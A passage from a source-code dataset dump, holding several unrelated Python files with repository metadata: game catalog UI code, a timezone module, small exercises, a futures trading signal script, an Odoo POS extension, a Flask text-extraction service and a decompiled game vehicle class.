'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
else:
emblemPrices = self['item'].getEmblemPrices()
if emblemPrices:
silver = emblemPrices[ToontownGlobals.EmblemTypes.Silver]
gold = emblemPrices[ToontownGlobals.EmblemTypes.Gold]
price = self['item'].getPrice(self['type'])
if price and silver and gold:
message = TTLocalizer.CatalogVerifyPurchaseBeanSilverGold % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
elif price and silver:
message = TTLocalizer.CatalogVerifyPurchaseBeanSilver % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
elif price and gold:
message = TTLocalizer.CatalogVerifyPurchaseBeanGold % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
elif silver and gold:
message = TTLocalizer.CatalogVerifyPurchaseSilverGold % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
elif silver:
message = TTLocalizer.CatalogVerifyPurchaseSilver % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
elif gold:
message = TTLocalizer.CatalogVerifyPurchaseGold % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'silver': silver,
'gold': gold }
else:
self.notify.warning('is this a completely free item %s?' % self['item'].getName())
message = TTLocalizer.CatalogVerifyPurchase % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
else:
message = TTLocalizer.CatalogVerifyPurchase % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
self.verify = TTDialog.TTGlobalDialog(doneEvent = 'verifyDone', message = message, style = TTDialog.TwoChoice)
self.verify.show()
self.accept('verifyDone', self._CatalogItemPanel__handleVerifyPurchase)
def _CatalogItemPanel__handleVerifyPurchase(self):
if base.config.GetBool('want-qa-regression', 0):
self.notify.info('QA-REGRESSION: CATALOG: Order item')
status = self.verify.doneStatus
self.ignore('verifyDone')
self.verify.cleanup()
del self.verify
self.verify = None
if status == 'ok':
item = self.items[self.itemIndex]
messenger.send('CatalogItemPurchaseRequest', [
item])
self.buyButton['state'] = DGG.DISABLED
def _CatalogItemPanel__handleGiftRequest(self):
if self['item'].replacesExisting() and self['item'].hasExisting():
message = TTLocalizer.CatalogOnlyOnePurchase % {
'old': self['item'].getYourOldDesc(),
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
else:
friendIndex = self.parentCatalogScreen.friendGiftIndex
friendText = 'Error'
numFriends = len(base.localAvatar.friendsList) + len(base.cr.avList) - 1
if numFriends > 0:
friendText = self.parentCatalogScreen.receiverName
message = TTLocalizer.CatalogVerifyGift % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']),
'friend': friendText }
self.verify = TTDialog.TTGlobalDialog(doneEvent = 'verifyGiftDone', message = message, style = TTDialog.TwoChoice)
self.verify.show()
self.accept('verifyGiftDone', self._CatalogItemPanel__handleVerifyGift)
def _CatalogItemPanel__handleVerifyGift(self):
if base.config.GetBool('want-qa-regression', 0):
self.notify.info('QA-REGRESSION: CATALOG: Gift item')
status = self.verify.doneStatus
self.ignore('verifyGiftDone')
self.verify.cleanup()
del self.verify
self.verify = None
if status == 'ok':
self.giftButton['state'] = DGG.DISABLED
item = self.items[self.itemIndex]
messenger.send('CatalogItemGiftPurchaseRequest', [
item])
def updateButtons(self, giftActivate = 0):
if self.parentCatalogScreen.gifting == -1:
self.updateBuyButton()
if self.loaded:
self.giftButton.hide()
else:
self.updateGiftButton(giftActivate)
if self.loaded:
self.buyButton.hide()
def updateGiftButton(self, giftUpdate = 0):
if not self.loaded:
return None
self.giftButton.show()
if giftUpdate == 0:
return None
if not base.cr.isPaid():
self.giftButton['command'] = self.getTeaserPanel()
self.auxText['text'] = ' '
numFriends = len(base.localAvatar.friendsList) + len(base.cr.avList) - 1
if numFriends > 0:
self.giftButton['state'] = DGG.DISABLED
self.giftButton.show()
auxText = ' '
if self['item'].isGift() <= 0:
self.giftButton.show()
self.giftButton['state'] = DGG.DISABLED
auxText = TTLocalizer.CatalogNotAGift
self.auxText['text'] = auxText
return None
elif self.parentCatalogScreen.gotAvatar == 1:
avatar = self.parentCatalogScreen.giftAvatar
if (self['item'].forBoysOnly() or avatar.getStyle().getGender() == 'f' or self['item'].forGirlsOnly()) and avatar.getStyle().getGender() == 'm':
self.giftButton.show()
self.giftButton['state'] = DGG.DISABLED
auxText = TTLocalizer.CatalogNoFit
self.auxText['text'] = auxText
return None
elif self['item'].reachedPurchaseLimit(avatar):
self.giftButton.show()
self.giftButton['state'] = DGG.DISABLED
auxText = TTLocalizer.CatalogPurchasedGiftText
self.auxText['text'] = auxText
return None
elif len(avatar.mailboxContents) + len(avatar.onGiftOrder) >= ToontownGlobals.MaxMailboxContents:
self.giftButton.show()
self.giftButton['state'] = DGG.DISABLED
auxText = TTLocalizer.CatalogMailboxFull
self.auxText['text'] = auxText
return None
elif self['item'].getPrice(self['type']) <= base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
self.giftButton['state'] = DGG.NORMAL
self.giftButton.show()
def handleSoundOnButton(self):
item = self.items[self.itemIndex]
self.soundOnButton.hide()
self.soundOffButton.show()
if hasattr(item, 'changeIval'):
if self.ival:
self.ival.finish()
self.ival = None
self.ival = item.changeIval(volume = 1)
self.ival.loop()
def handleSoundOffButton(self):
item = self.items[self.itemIndex]
self.soundOffButton.hide()
self.soundOnButton.show()
if hasattr(item, 'changeIval'):
if self.ival:
self.ival.finish()
self.ival = None
self.ival = item.changeIval(volume = 0)
self.ival.loop()
| [
"[email protected]"
] | |
4103376dbbca20b7caa6c000a96c5304895c31f9 | e017eca53dbe0d35977546df1bb36a59915f6899 | /debugging/assert_variable.py | 8aec26cfafa0f80b02465a455cc3c785aa89bd35 | [] | no_license | clivejan/python_basic | 7d14b7335f253658f8814acbdb753a735481e377 | 773de644a87792b872e38017dcac34c1691ccc87 | refs/heads/master | 2020-12-04T17:44:24.737370 | 2020-01-09T14:43:36 | 2020-01-18T03:11:20 | 231,856,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | #!/usr/bin/env python3 -O
# Assertion is used for programmer errors and
# should not use try except to handle it.
# Status well
job_title = 'DevOps'
assert job_title == "DevOps", "Tansform from SE to DevOps"
# Status wrong
job_title = 'Systems Engineer'
assert job_title == "DevOps", "Tansform from SE to DevOps"
print(job_title)
| [
"[email protected]"
] | |
0116db3631d3d531836248a0bca1d5d46ba83d49 | 302442c32bacca6cde69184d3f2d7529361e4f3c | /cidtrsend-all/stage3-model/pytz/zoneinfo/Africa/Bujumbura.py | 76c4c7a6e44ba67e832b34d93a452c2827caf84f | [] | no_license | fucknoob/WebSemantic | 580b85563072b1c9cc1fc8755f4b09dda5a14b03 | f2b4584a994e00e76caccce167eb04ea61afa3e0 | refs/heads/master | 2021-01-19T09:41:59.135927 | 2015-02-07T02:11:23 | 2015-02-07T02:11:23 | 30,441,659 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | '''tzinfo timezone information for Africa/Bujumbura.'''
from pytz.tzinfo import StaticTzInfo
from pytz.tzinfo import memorized_timedelta as timedelta
class Bujumbura(StaticTzInfo):
'''Africa/Bujumbura timezone definition. See datetime.tzinfo for details'''
zone = 'Africa/Bujumbura'
_utcoffset = timedelta(seconds=7200)
_tzname = 'CAT'
Bujumbura = Bujumbura()
| [
"[email protected]"
] | |
ab96c2674dd84ae1432b1ef67ca398aa1e033854 | 71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c | /.history/第2章/2-2/lishi_20200527235931.py | 947e75d59de12d8489b2a6b14a7c1c09b49fe148 | [
"MIT"
] | permissive | dltech-xyz/Alg_Py_Xiangjie | 03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3 | 877c0f8c75bf44ef524f858a582922e9ca39bbde | refs/heads/master | 2022-10-15T02:30:21.696610 | 2020-06-10T02:35:36 | 2020-06-10T02:35:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | #!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-05-27 23:59:31
@Description:将列表的最后几项作为历史记录的过程。
'''
from _collections import deque
def search(lines, pattern, history=5):
previous_lines = deque(maxlen=history)
for line in lines:
if pattern in line:
yield line, previous_lines
previous_lines.append(line)
# Example use on a file
if __name__ == '__main__':
with open('\123.txt') as f:
# with open('123.txt') as f: # FileNotFoundError: [Errno 2] No such file or directory: '123.txt'
for line, prevlines in search(f, 'python', 5):
for pline in prevlines:
print(pline) # print (pline, end='')
print(line) # print (pline, end='')
print('-' * 20)
q = deque(maxlen=3)
q.append(1)
q.append(2)
q.append(3)
print(q)
q.append(4)
print(q)
| [
"[email protected]"
] | |
82c5ce7b4ebbb0b5752945713ead109a06be2960 | 16ba38ef11b82e93d3b581bbff2c21e099e014c4 | /haohaninfo/Python_Future_Sample/實單交易/90.py | dbf39a68d38224f520449600d95099dfb3431206 | [] | no_license | penguinwang96825/Auto-Trading | cb7a5addfec71f611bdd82534b90e5219d0602dd | a031a921dbc036681c5054f2c035f94499b95d2e | refs/heads/master | 2022-12-24T21:25:34.835436 | 2020-09-22T09:59:56 | 2020-09-22T09:59:56 | 292,052,986 | 2 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,692 | py | # -*- coding: UTF-8 -*-
# 載入相關套件
import sys,indicator,datetime,haohaninfo
# 券商
Broker = 'Masterlink_Future'
# 定義資料類別
Table = 'match'
# 定義商品名稱
Prod = sys.argv[1]
# 取得當天日期
Date = datetime.datetime.now().strftime("%Y%m%d")
# K棒物件
KBar = indicator.KBar(Date,'time',1)
# 定義威廉指標的週期、超買區、超賣區
WILLRPeriod = 14
OverBuy = -20
OverSell = -80
# 預設趨勢為1,假設只有多單進場
Trend=1
# 進場判斷
Index=0
GO = haohaninfo.GOrder.GOQuote()
for i in GO.Describe(Broker, Table, Prod):
time = datetime.datetime.strptime(i[0],'%Y/%m/%d %H:%M:%S.%f')
price=float(i[2])
qty=int(i[3])
tag=KBar.TimeAdd(time,price,qty)
# 更新K棒才判斷,若要逐筆判斷則 註解下面兩行
if tag != 1:
continue
Real = KBar.GetWILLR(WILLRPeriod)
# 當威廉指標已經計算完成,才會去進行判斷
if len(Real) > WILLRPeriod+1:
ThisReal = Real[-1-tag]
LastReal = Real[-2-tag]
# 進入超賣區 並且回檔
if Trend==1 and ThisReal > OverSell and LastReal <= OverSell:
Index=1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Buy Price:",OrderPrice,"Success!")
GO.EndDescribe()
# 進入超買區 並且回檔
elif Trend==-1 and ThisReal < OverBuy and LastReal >= OverBuy:
Index=-1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Sell Price:",OrderPrice,"Success!")
GO.EndDescribe()
| [
"[email protected]"
] | |
5106152e77d060a927253686296d12540bed8155 | 2a94e60460f91c4a4b919953ef1a15de4d89166a | /argil_cb_pos_ticket/pos.py | 79525802be904af3b677e6207922930e7981aaf3 | [] | no_license | germanponce/addons_cb | de8ddee13df36cf2278edbbc495564bbff8ea29e | 858453d4f4c3e8b43d34a759b20306926f0bf63e | refs/heads/master | 2021-01-22T23:20:16.826694 | 2015-10-29T22:05:03 | 2015-10-29T22:05:03 | 41,502,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
from openerp.tools import float_compare
import openerp.addons.decimal_precision as dp
from datetime import time, datetime
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import osv, fields, expression
from openerp.tools.translate import _
from openerp.exceptions import except_orm, Warning, RedirectWarning
import base64
import amount_to_text_mx as amount_to
# AMOUNT TO TEXT
class pos_order(osv.osv):
_name ='pos.order'
_inherit = 'pos.order'
def _amount_text(self, cr, uid, ids, field_name, args, context=None):
if not context:
context = {}
res = {}
amount_to_text = ''
for record in self.browse(cr, uid, ids, context=context):
if record.amount_total > 0:
amount_to_text = amount_to.get_amount_to_text(
self, record.amount_total, 'es_cheque', record.pricelist_id.currency_id.name
)
res[record.id] = amount_to_text
return res
_columns = {
'amount_to_text': fields.function(_amount_text, method=True, string='Monto en Letra', type='char', size=256, store=True),
}
| [
"[email protected]"
] | |
0a97d29e2bec4a1a9d370b41f0a000614f2f24db | c3e2f56672e01590dc7dc7e184f30c2884ce5d3a | /Programs/MyPythonXII/Unit1/PyChap06/filera.py | 9500b097eee3e35d0a288c02f76d1e850d45b55f | [] | no_license | mridulrb/Basic-Python-Examples-for-Beginners | ef47e830f3cc21cee203de2a7720c7b34690e3e1 | 86b0c488de4b23b34f7424f25097afe1874222bd | refs/heads/main | 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | # File name: ...\\MyPythonXII\Unit1\PyChap06\filera.py
import os
txtfile = "Friends.txt" # Text file is assigned
if os.path.isfile(txtfile):
print ("Friends names are...")
print ("-------------------")
for F in open(txtfile).read(): # Both open and read the contents
print (F, end="")
else:
print ("File does not exist.")
| [
"[email protected]"
] | |
b8e7b0de85b7573829e61fafb9cd287c1173b9af | fbd5c602a612ea9e09cdd35e3a2120eac5a43ccf | /Finished/old_py/75.颜色分类.py | 7bd771f54cb7ff8dcc151c48d2e2b94a7f6bf8e8 | [] | no_license | czccc/LeetCode | 0822dffee3b6fd8a6c6e34be2525bbd65ccfa7c0 | ddeb1c473935480c97f3d7986a602ee2cb3acaa8 | refs/heads/master | 2023-09-01T18:18:45.973563 | 2023-08-27T02:44:00 | 2023-08-27T02:44:00 | 206,226,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | #
# @lc app=leetcode.cn id=75 lang=python
#
# [75] 颜色分类
#
# @lc code=start
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
left, right = -1, len(nums)
p = 0
while p < right:
if nums[p] == 2:
right -= 1
nums[p] = nums[right]
nums[right] = 2
elif nums[p] == 1:
p += 1
else:
left += 1
nums[p] = 1
nums[left] = 0
p += 1
return
# @lc code=end
# TEST ONLY
import unittest
import sys
sys.path.append("..")
from Base.PyVar import *
class SolutionTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._func = Solution().sortColors
def test_1(self):
args = [[2, 0, 2, 1, 1, 0]]
ans = [0, 0, 1, 1, 2, 2]
cur_ans = self._func(*args)
self.assertEqual(args[0], ans)
if __name__ == "__main__":
unittest.main(verbosity=2)
| [
"[email protected]"
] | |
5c9dac8602f051955f5bba3b5b992bee8b05f77a | 88900156c1fc6d496e87a0c403811e30a7398cfc | /check4fsm/Communication.py | 70dd87ad40c4646164be3443114f9caeac43fce8 | [] | no_license | Totoro2205/check4fsm | 4be7b73b9331ed2d46ce119b762d67a64a4420cc | 4245b7f0babca6f5d15d1f85ee85fddc69cf0196 | refs/heads/main | 2023-08-10T07:32:22.121413 | 2021-09-20T09:28:57 | 2021-09-20T09:28:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,207 | py | #!/usr/bin/env python
from check4fsm.ProccesText import ProcessText
from check4fsm.TonalizeText import TonalText
from check4fsm.ProcessAppeal import ProcessAppeal
from check4fsm.extractAllData import ExtractData
from check4fsm import *
from natasha import Segmenter, Doc
from loguru import logger
from flask_cors import CORS
import flask
import time
import nltk
import os
logger.add(f"{os.getcwd()}/.logger.log", format="{time} {level} {message}", rotation="50 MB")
ed = ExtractData(os.getcwd() + "/../data/cities.json", os.getcwd() + "/../data/NER.json")
app = flask.Flask(__name__)
class CommunicationFlask:
CORS(app)
def __init__(self, cities: str = os.getcwd() + "/../data/cities.json",
ner: str = os.getcwd() + "/../data/NER.json"):
global ed
ed = ExtractData(cities, ner)
@staticmethod
@logger.catch
@app.route('/', methods=["GET"])
def main_route():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@staticmethod
@logger.catch
@app.route('/', methods=["POST"])
def hooks():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@logger.catch
def run_flask(self):
global app
app.run(host="0.0.0.0", port=9000)
def run(cities: str = os.getcwd() + "/data/cities.json", ner: str = os.getcwd() + "/data/NER.json"):
logger.info("Loading all systems")
p = CommunicationFlask(cities, ner)
logger.info("Loaded all systems")
p.run_flask()
if __name__ == '__main__':
run( os.getcwd() + "/data/cities.json", os.getcwd() + "/data/NER.json") | [
"[email protected]"
] | |
09a53f5f138f99f620cd6ce77126883840240b39 | 9c85d132b2ed8c51f021f42ed9f20652827bca45 | /source/res/scripts/client/gui/shared/gui_items/vehicle.py | 3abc3d8ff7ab639c495503159428a7e726120fa4 | [] | no_license | Mododejl/WorldOfTanks-Decompiled | 0f4063150c7148184644768b55a9104647f7e098 | cab1b318a58db1e428811c41efc3af694906ba8f | refs/heads/master | 2020-03-26T18:08:59.843847 | 2018-06-12T05:40:05 | 2018-06-12T05:40:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52,084 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/gui_items/Vehicle.py
import math
import random
from itertools import izip
from operator import itemgetter
import BigWorld
import constants
from AccountCommands import LOCK_REASON, VEHICLE_SETTINGS_FLAG
from account_shared import LayoutIterator
from constants import WIN_XP_FACTOR_MODE
from gui import makeHtmlString
from gui.Scaleform.locale.ITEM_TYPES import ITEM_TYPES
from gui.Scaleform.locale.RES_ICONS import RES_ICONS
from gui.prb_control import prb_getters
from gui.prb_control.settings import PREBATTLE_SETTING_NAME
from gui.shared.economics import calcRentPackages, getActionPrc, calcVehicleRestorePrice
from gui.shared.formatters import text_styles
from gui.shared.gui_items import CLAN_LOCK, GUI_ITEM_TYPE, getItemIconName, GUI_ITEM_ECONOMY_CODE
from gui.shared.gui_items.vehicle_equipment import VehicleEquipment
from gui.shared.gui_items.gui_item import HasStrCD
from gui.shared.gui_items.fitting_item import FittingItem, RentalInfoProvider
from gui.shared.gui_items.Tankman import Tankman
from gui.shared.money import MONEY_UNDEFINED, Currency, Money
from gui.shared.gui_items.customization.outfit import Outfit
from gui.shared.gui_items.gui_item_economics import ItemPrice, ItemPrices, ITEM_PRICE_EMPTY
from gui.shared.utils import makeSearchableString
from helpers import i18n, time_utils, dependency
from items import vehicles, tankmen, customizations, getTypeInfoByName, getTypeOfCompactDescr
from items.components.c11n_constants import SeasonType, CustomizationType, StyleFlags
from shared_utils import findFirst, CONST_CONTAINER
from skeletons.gui.game_control import IIGRController
from skeletons.gui.lobby_context import ILobbyContext
from skeletons.gui.server_events import IEventsCache
class VEHICLE_CLASS_NAME(CONST_CONTAINER):
LIGHT_TANK = 'lightTank'
MEDIUM_TANK = 'mediumTank'
HEAVY_TANK = 'heavyTank'
SPG = 'SPG'
AT_SPG = 'AT-SPG'
VEHICLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TYPES_ORDER)))
UNKNOWN_VEHICLE_CLASS_ORDER = 100
def compareByVehTypeName(vehTypeA, vehTypeB):
return VEHICLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TYPES_ORDER_INDICES[vehTypeB]
def compareByVehTableTypeName(vehTypeA, vehTypeB):
return VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeB]
VEHICLE_TABLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_TABLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TABLE_TYPES_ORDER)))
VEHICLE_TABLE_TYPES_ORDER_INDICES_REVERSED = dict(((n, i) for i, n in enumerate(reversed(VEHICLE_TABLE_TYPES_ORDER))))
VEHICLE_BATTLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_BATTLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_BATTLE_TYPES_ORDER)))
class VEHICLE_TAGS(CONST_CONTAINER):
PREMIUM = 'premium'
PREMIUM_IGR = 'premiumIGR'
CANNOT_BE_SOLD = 'cannot_be_sold'
SECRET = 'secret'
SPECIAL = 'special'
OBSERVER = 'observer'
DISABLED_IN_ROAMING = 'disabledInRoaming'
EVENT = 'event_battles'
EXCLUDED_FROM_SANDBOX = 'excluded_from_sandbox'
TELECOM = 'telecom'
UNRECOVERABLE = 'unrecoverable'
CREW_LOCKED = 'lockCrew'
OUTFIT_LOCKED = 'lockOutfit'
class Vehicle(FittingItem, HasStrCD):
__slots__ = ('__descriptor', '__customState', '_inventoryID', '_xp', '_dailyXPFactor', '_isElite', '_isFullyElite', '_clanLock', '_isUnique', '_rentPackages', '_hasRentPackages', '_isDisabledForBuy', '_isSelected', '_restorePrice', '_canTradeIn', '_canTradeOff', '_tradeOffPriceFactor', '_tradeOffPrice', '_searchableUserName', '_personalDiscountPrice', '_rotationGroupNum', '_rotationBattlesLeft', '_isRotationGroupLocked', '_isInfiniteRotationGroup', '_settings', '_lock', '_repairCost', '_health', '_gun', '_turret', '_engine', '_chassis', '_radio', '_fuelTank', '_optDevices', '_shells', '_equipment', '_equipmentLayout', '_bonuses', '_crewIndices', '_crew', '_lastCrew', '_hasModulesToSelect', '_customOutfits', '_styledOutfits')
NOT_FULL_AMMO_MULTIPLIER = 0.2
MAX_RENT_MULTIPLIER = 2
class VEHICLE_STATE(object):
DAMAGED = 'damaged'
EXPLODED = 'exploded'
DESTROYED = 'destroyed'
UNDAMAGED = 'undamaged'
BATTLE = 'battle'
IN_PREBATTLE = 'inPrebattle'
LOCKED = 'locked'
CREW_NOT_FULL = 'crewNotFull'
AMMO_NOT_FULL = 'ammoNotFull'
AMMO_NOT_FULL_EVENTS = 'ammoNotFullEvents'
SERVER_RESTRICTION = 'serverRestriction'
RENTAL_IS_OVER = 'rentalIsOver'
IGR_RENTAL_IS_OVER = 'igrRentalIsOver'
IN_PREMIUM_IGR_ONLY = 'inPremiumIgrOnly'
GROUP_IS_NOT_READY = 'group_is_not_ready'
NOT_PRESENT = 'notpresent'
UNAVAILABLE = 'unavailable'
UNSUITABLE_TO_QUEUE = 'unsuitableToQueue'
UNSUITABLE_TO_UNIT = 'unsuitableToUnit'
CUSTOM = (UNSUITABLE_TO_QUEUE, UNSUITABLE_TO_UNIT)
DEAL_IS_OVER = 'dealIsOver'
ROTATION_GROUP_UNLOCKED = 'rotationGroupUnlocked'
ROTATION_GROUP_LOCKED = 'rotationGroupLocked'
CAN_SELL_STATES = [VEHICLE_STATE.UNDAMAGED,
VEHICLE_STATE.CREW_NOT_FULL,
VEHICLE_STATE.AMMO_NOT_FULL,
VEHICLE_STATE.GROUP_IS_NOT_READY,
VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
VEHICLE_STATE.UNSUITABLE_TO_UNIT,
VEHICLE_STATE.ROTATION_GROUP_UNLOCKED,
VEHICLE_STATE.ROTATION_GROUP_LOCKED]
GROUP_STATES = [VEHICLE_STATE.GROUP_IS_NOT_READY]
class VEHICLE_STATE_LEVEL(object):
CRITICAL = 'critical'
INFO = 'info'
WARNING = 'warning'
RENTED = 'rented'
igrCtrl = dependency.descriptor(IIGRController)
eventsCache = dependency.descriptor(IEventsCache)
lobbyContext = dependency.descriptor(ILobbyContext)
def __init__(self, strCompactDescr=None, inventoryID=-1, typeCompDescr=None, proxy=None):
if strCompactDescr is not None:
vehDescr = vehicles.VehicleDescr(compactDescr=strCompactDescr)
else:
_, nID, innID = vehicles.parseIntCompactDescr(typeCompDescr)
vehDescr = vehicles.VehicleDescr(typeID=(nID, innID))
self.__descriptor = vehDescr
HasStrCD.__init__(self, strCompactDescr)
FittingItem.__init__(self, vehDescr.type.compactDescr, proxy)
self._inventoryID = inventoryID
self._xp = 0
self._dailyXPFactor = -1
self._isElite = False
self._isFullyElite = False
self._clanLock = 0
self._isUnique = self.isHidden
self._rentPackages = []
self._hasRentPackages = False
self._isDisabledForBuy = False
self._isSelected = False
self._restorePrice = None
self._canTradeIn = False
self._canTradeOff = False
self._tradeOffPriceFactor = 0
self._tradeOffPrice = MONEY_UNDEFINED
self._rotationGroupNum = 0
self._rotationBattlesLeft = 0
self._isRotationGroupLocked = False
self._isInfiniteRotationGroup = False
self._customOutfits = {}
self._styledOutfits = {}
if self.isPremiumIGR:
self._searchableUserName = makeSearchableString(self.shortUserName)
else:
self._searchableUserName = makeSearchableString(self.userName)
invData = dict()
tradeInData = None
if proxy is not None and proxy.inventory.isSynced() and proxy.stats.isSynced() and proxy.shop.isSynced() and proxy.vehicleRotation.isSynced() and proxy.recycleBin.isSynced():
invDataTmp = proxy.inventory.getItems(GUI_ITEM_TYPE.VEHICLE, inventoryID)
if invDataTmp is not None:
invData = invDataTmp
tradeInData = proxy.shop.tradeIn
self._xp = proxy.stats.vehiclesXPs.get(self.intCD, self._xp)
if proxy.shop.winXPFactorMode == WIN_XP_FACTOR_MODE.ALWAYS or self.intCD not in proxy.stats.multipliedVehicles and not self.isOnlyForEventBattles:
self._dailyXPFactor = proxy.shop.dailyXPFactor
self._isElite = not vehDescr.type.unlocksDescrs or self.intCD in proxy.stats.eliteVehicles
self._isFullyElite = self.isElite and not any((data[1] not in proxy.stats.unlocks for data in vehDescr.type.unlocksDescrs))
clanDamageLock = proxy.stats.vehicleTypeLocks.get(self.intCD, {}).get(CLAN_LOCK, 0)
clanNewbieLock = proxy.stats.globalVehicleLocks.get(CLAN_LOCK, 0)
self._clanLock = clanDamageLock or clanNewbieLock
self._isDisabledForBuy = self.intCD in proxy.shop.getNotToBuyVehicles()
self._hasRentPackages = bool(proxy.shop.getVehicleRentPrices().get(self.intCD, {}))
self._isSelected = bool(self.invID in proxy.stats.oldVehInvIDs)
self._customOutfits = self._parseCustomOutfits(self.intCD, proxy)
self._styledOutfits = self._parseStyledOutfits(self.intCD, proxy)
restoreConfig = proxy.shop.vehiclesRestoreConfig
self._restorePrice = calcVehicleRestorePrice(self.buyPrices.itemPrice.defPrice, proxy.shop)
self._restoreInfo = proxy.recycleBin.getVehicleRestoreInfo(self.intCD, restoreConfig.restoreDuration, restoreConfig.restoreCooldown)
self._personalDiscountPrice = proxy.shop.getPersonalVehicleDiscountPrice(self.intCD)
self._rotationGroupNum = proxy.vehicleRotation.getGroupNum(self.intCD)
self._rotationBattlesLeft = proxy.vehicleRotation.getBattlesCount(self.rotationGroupNum)
self._isRotationGroupLocked = proxy.vehicleRotation.isGroupLocked(self.rotationGroupNum)
self._isInfiniteRotationGroup = proxy.vehicleRotation.isInfinite(self.rotationGroupNum)
self._inventoryCount = 1 if invData.keys() else 0
data = invData.get('rent')
if data is not None:
self._rentInfo = RentalInfoProvider(isRented=True, *data)
self._settings = invData.get('settings', 0)
self._lock = invData.get('lock', (0, 0))
self._repairCost, self._health = invData.get('repair', (0, 0))
self._gun = self.itemsFactory.createVehicleGun(vehDescr.gun.compactDescr, proxy, vehDescr.gun)
self._turret = self.itemsFactory.createVehicleTurret(vehDescr.turret.compactDescr, proxy, vehDescr.turret)
self._engine = self.itemsFactory.createVehicleEngine(vehDescr.engine.compactDescr, proxy, vehDescr.engine)
self._chassis = self.itemsFactory.createVehicleChassis(vehDescr.chassis.compactDescr, proxy, vehDescr.chassis)
self._radio = self.itemsFactory.createVehicleRadio(vehDescr.radio.compactDescr, proxy, vehDescr.radio)
self._fuelTank = self.itemsFactory.createVehicleFuelTank(vehDescr.fuelTank.compactDescr, proxy, vehDescr.fuelTank)
sellPrice = self._calcSellPrice(proxy)
defaultSellPrice = self._calcDefaultSellPrice(proxy)
self._sellPrices = ItemPrices(itemPrice=ItemPrice(price=sellPrice, defPrice=defaultSellPrice), itemAltPrice=ITEM_PRICE_EMPTY)
if tradeInData is not None and tradeInData.isEnabled and self.isPremium and not self.isPremiumIGR:
self._tradeOffPriceFactor = tradeInData.sellPriceFactor
tradeInLevels = tradeInData.allowedVehicleLevels
